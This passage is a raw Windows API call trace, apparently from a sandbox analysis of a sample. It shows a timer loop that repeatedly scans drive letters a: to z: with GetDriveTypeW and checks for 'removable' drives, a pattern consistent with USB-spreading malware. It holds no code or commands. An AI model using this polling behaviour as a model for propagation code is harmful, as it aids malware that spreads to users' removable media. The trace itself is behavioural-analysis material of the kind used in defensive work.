(lpRootPathName="p:\\") returned 0x1 [0220.266] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.266] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.267] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.267] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.267] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.267] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.267] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.267] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.268] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.268] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0220.268] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0220.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0220.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0220.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.269] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0220.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0220.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0220.269] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.269] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0220.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.269] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f00 | out: hHeap=0x12c0000) returned 1 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.270] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0220.270] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0220.270] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.270] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.271] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.271] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0220.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d50 [0220.271] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0220.271] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0220.271] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0220.271] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.272] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.272] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.272] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.272] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.272] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0220.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.272] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0220.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0220.272] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.273] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.273] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.273] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.273] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.273] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.273] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.274] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.274] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.274] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.275] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.275] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.275] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.330] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.330] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.330] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.331] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.331] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.331] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.331] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.332] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.332] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.332] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.332] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.333] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.333] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.333] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.333] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.333] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0220.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0220.334] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0220.334] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.334] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.334] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.335] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.335] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.335] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.335] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0220.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0220.335] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.335] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0220.335] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0220.336] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e640 | out: hHeap=0x12c0000) returned 1 [0220.336] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.336] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0220.336] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0220.336] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.336] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0220.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0220.337] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0220.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0220.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0220.337] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0220.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0220.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.337] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0220.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.337] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0220.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0220.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0220.338] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.338] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0220.338] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0220.338] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0220.338] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0220.339] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0220.339] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0220.339] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0220.340] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0220.340] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0220.340] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0220.341] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0220.341] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0220.342] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0220.342] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0220.342] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0220.342] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0220.343] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0220.343] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0220.343] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0220.343] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0220.344] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0220.344] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0220.344] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0220.344] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0220.344] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0220.345] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0220.345] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0220.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0220.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0220.345] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0220.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0220.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.345] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0220.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.346] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0220.346] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0220.346] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0220.346] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0220.346] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0220.346] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0220.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0220.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326160 [0220.346] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.346] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0220.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0220.346] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326160 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0220.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0220.347] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0220.347] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0220.347] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0220.347] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0220.347] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0220.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0220.347] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0220.347] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0220.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318ba0 | out: hHeap=0x12c0000) returned 1 [0220.348] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0220.348] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0220.348] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0220.348] HeapFree (in: 